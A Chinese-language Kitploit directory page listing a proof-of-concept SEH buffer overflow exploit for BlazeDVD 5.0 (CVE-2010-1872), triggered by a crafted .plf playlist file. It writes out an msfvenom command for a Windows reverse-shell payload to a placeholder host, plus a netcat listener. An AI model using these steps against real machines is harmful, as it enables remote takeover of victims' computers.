Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2010-1872-BlazeDVD-SEH-Exploit — 概念验证SEH缓冲区溢出漏洞利用,针对BlazeDVD 5.0,通过精心构造的.plf播放列表文件,使用msfvenom生成反向shell载荷,用于教育安全研究。 | Kitploit
工具/GitHubGitHub/lipeozyy/cve-2010-1872-blazedvd-seh-exploit
漏洞分析漏洞利用Shellcode渗透测试学习与教育Payload 开发二进制利用
GitHublipeozyy/cve-2010-1872-blazedvd-seh-exploit

CVE-2010-1872-BlazeDVD-SEH-Exploit

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

概念验证SEH缓冲区溢出漏洞利用,针对BlazeDVD 5.0,通过精心构造的.plf播放列表文件,使用msfvenom生成反向shell载荷,用于教育安全研究。

查看仓库
131年前尚未审核
分享

BlazeDVD 5.0 - '.PLF' 播放列表 SEH 缓冲区溢出漏洞利用 (CVE-2010-1872)

针对 BlazeDVD 5.0 中通过构造的 .plf 播放列表文件触发的缓冲区溢出漏洞的概念验证 (PoC) 漏洞利用。该漏洞利用使用 SEH(结构化异常处理程序)覆盖 来实现代码执行。

详细信息

  • 软件: BlazeDVD
  • 版本: 5.0
  • 漏洞: 通过 .plf 文件触发的缓冲区溢出
  • 技术: 结构化异常处理程序 (SEH) 覆盖
  • CVE: CVE-2010-1872
  • 测试环境: Windows XP SP3(DEP 和 ASLR 已禁用)

免责声明

此代码仅用于教育和研究目的。任何滥用此代码的行为都可能违反当地或国际法律。对于因不当使用造成的任何损害,我不承担任何责任。

工作原理

该漏洞利用生成一个恶意的 .plf 文件,当在 BlazeDVD 中打开时,会触发缓冲区溢出并覆盖 SEH(结构化异常处理程序),将执行重定向到反向 Shell 载荷。

使用方法

  1. 使用 msfvenom 生成 Shellcode
    使用 以原始格式创建反向 Shell 载荷,避开坏字符。

msfvenom
root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c

将漏洞利用脚本中的 shellcode 替换为 msfvenom 的输出。

  • 启动 Netcat(监听器)
    在另一个终端中,开始监听所选端口 8443:

    root@kitploit:~
    nc -lvnp 8443
    
  • 捕获反向 Shell
    如果成功,反向 Shell 将连接到你的监听器。

  • 下载工具